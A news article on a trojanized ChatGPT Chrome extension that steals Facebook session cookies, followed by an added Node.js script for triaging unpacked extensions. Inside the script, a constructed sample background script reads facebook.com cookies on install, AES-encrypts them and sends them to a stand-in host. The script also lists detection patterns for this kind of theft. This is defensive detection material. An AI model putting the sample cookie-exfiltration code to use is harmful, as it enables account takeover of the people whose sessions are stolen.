A trojanized version of the popular ChatGPT extension for Google Chrome has been discovered on the Chrome Web Store.
The malicious extension has already amassed over 9,000 installs while harvesting Facebook session cookies. It was first uploaded to the Chrome Web Store on February 14, 2023, but was only promoted, via Google Search advertisements, beginning March 14, 2023. Since then it has averaged roughly a thousand installations per day.
The extension is a copy of the legitimate “ChatGPT for Google” add-on that provides ChatGPT integration on search results.
However, it includes additional code that steals Facebook session cookies. Once the victim installs the extension, the added code runs from the extension's onInstalled handler (chrome.runtime.onInstalled), so the theft happens immediately, before the user has opened a single page. Replaying a valid session cookie requires neither the password nor a second factor, so the threat actors can log in as the user and gain full access to the profile, including any business advertising features.
The malicious extension is promoted via advertisements in Google Search results, which are prominently featured when searching for “Chat GPT 4.” Clicking on the sponsored search results takes users to a fake “ChatGPT for Google” landing page, and from there, to the extension’s page on Chrome’s official add-on store.
Upon installation, the malware abuses the Chrome Extension API (the cookies permission) to enumerate Facebook-related cookies, encrypts them with an AES key, and exfiltrates the result via a GET request to the attacker's server, a detail worth noting for anyone whose egress inspection only looks at POST bodies.
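The behaviour described in the two paragraphs above (onInstalled trigger, cookies API scoped to facebook.com, AES encryption, outbound GET) is a recognisable pattern that can be triaged statically in an unpacked extension. The following is an added example written for this page, not code from the article or from Guardio Labs: a small Node.js triage script that scores a manifest plus its background script against those indicators. The manifest, the two background scripts and the hostname collector.example.invalid are constructed for the example and are not indicators of compromise; the weights are this example's own heuristic.

```javascript
// Added example: static triage of an unpacked Chrome extension for the
// Facebook session-cookie-stealer pattern described in the article.
// Indicators: "cookies" permission, facebook.com host permission, an
// onInstalled handler, chrome.cookies.getAll targeting facebook.com,
// client-side AES, and an outbound request to a non-Facebook host.

const FACEBOOK_RE = /facebook\.com/i;

// Source-code indicators. Weights are this example's own heuristic (assumption),
// not a published scoring scheme.
const SOURCE_INDICATORS = [
  { name: "onInstalled-handler", re: /chrome\.runtime\.onInstalled\.addListener/, weight: 1 },
  { name: "cookies-getAll",      re: /chrome\.cookies\.getAll\s*\(/,             weight: 2 },
  { name: "facebook-cookie-domain",
    re: /cookies\.getAll\s*\(\s*\{[^}]*domain\s*:\s*["'][^"']*facebook/i, weight: 3 },
  { name: "aes-encryption",
    re: /\bAES\b|CryptoJS|crypto\.subtle\.encrypt/, weight: 1 },
];

// Collect every hostname that appears in an absolute URL inside the script.
function extractHosts(source) {
  const hosts = new Set();
  for (const m of source.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) {
    hosts.add(m[1].toLowerCase());
  }
  return [...hosts];
}

// Returns { score, verdict, findings } for one manifest + background script.
function auditExtension(manifest, backgroundSource) {
  const findings = [];
  const perms = [
    ...(manifest.permissions || []),
    ...(manifest.host_permissions || []),   // MV3 puts host patterns here
  ];
  if (perms.includes("cookies")) findings.push({ name: "cookies-permission", weight: 2 });
  if (perms.some((p) => FACEBOOK_RE.test(p))) {
    findings.push({ name: "facebook-host-permission", weight: 1 });
  }
  for (const ind of SOURCE_INDICATORS) {
    if (ind.re.test(backgroundSource)) findings.push({ name: ind.name, weight: ind.weight });
  }
  // An external host is only an exfil indicator when cookies are also read;
  // a benign extension calling its own API must not trip this rule.
  const external = extractHosts(backgroundSource).filter((h) => !FACEBOOK_RE.test(h));
  if (external.length && findings.some((f) => f.name === "cookies-getAll")) {
    findings.push({ name: "exfil-endpoint", weight: 3, hosts: external });
  }
  const score = findings.reduce((s, f) => s + f.weight, 0);
  const verdict = score >= 8 ? "likely cookie stealer" : score >= 4 ? "suspicious" : "clean";
  return { score, verdict, findings };
}

// Constructed sample mirroring the article's description (not the real extension).
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: "ChatGPT for Google (constructed lookalike)",
  permissions: ["cookies", "storage"],
  host_permissions: ["https://*.facebook.com/*", "https://*.google.com/*"],
  background: { service_worker: "background.js" },
};
const SAMPLE_BACKGROUND = `
chrome.runtime.onInstalled.addListener(async () => {
  const cookies = await chrome.cookies.getAll({ domain: ".facebook.com" });
  const blob = CryptoJS.AES.encrypt(JSON.stringify(cookies), KEY).toString();
  fetch("https://collector.example.invalid/c?d=" + encodeURIComponent(blob));
});
`;

// Constructed benign control: onInstalled is normal; no cookies access.
const BENIGN_MANIFEST = {
  manifest_version: 3,
  name: "Search helper (constructed benign sample)",
  permissions: ["storage"],
  host_permissions: ["https://www.google.com/*"],
};
const BENIGN_BACKGROUND = `
chrome.runtime.onInstalled.addListener(() => {
  chrome.storage.sync.set({ theme: "auto" });
  fetch("https://api.example.invalid/ping");
});
`;

console.log(JSON.stringify(auditExtension(SAMPLE_MANIFEST, SAMPLE_BACKGROUND), null, 2));
console.log(JSON.stringify(auditExtension(BENIGN_MANIFEST, BENIGN_BACKGROUND), null, 2));
```

Run it with `node audit.js` against an extension unpacked from the Chrome profile's Extensions directory (after dropping the manifest and background script into the two variables). The control sample shows the important design choice: a fetch to a third-party host on its own is not evidence, only its combination with a cookie read is, otherwise every extension with a backend would score as suspicious.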
The security researcher who discovered the malware, Nati Tal of Guardio Labs, reported the malicious extension to the Chrome Web Store team, which will likely remove it soon. However, the threat actors likely have a plan ‘C’ via another “parked” extension that could facilitate the next infection wave.
This latest campaign is part of a broader trend of cybercriminals targeting browser extensions to steal sensitive data and gain access to online accounts.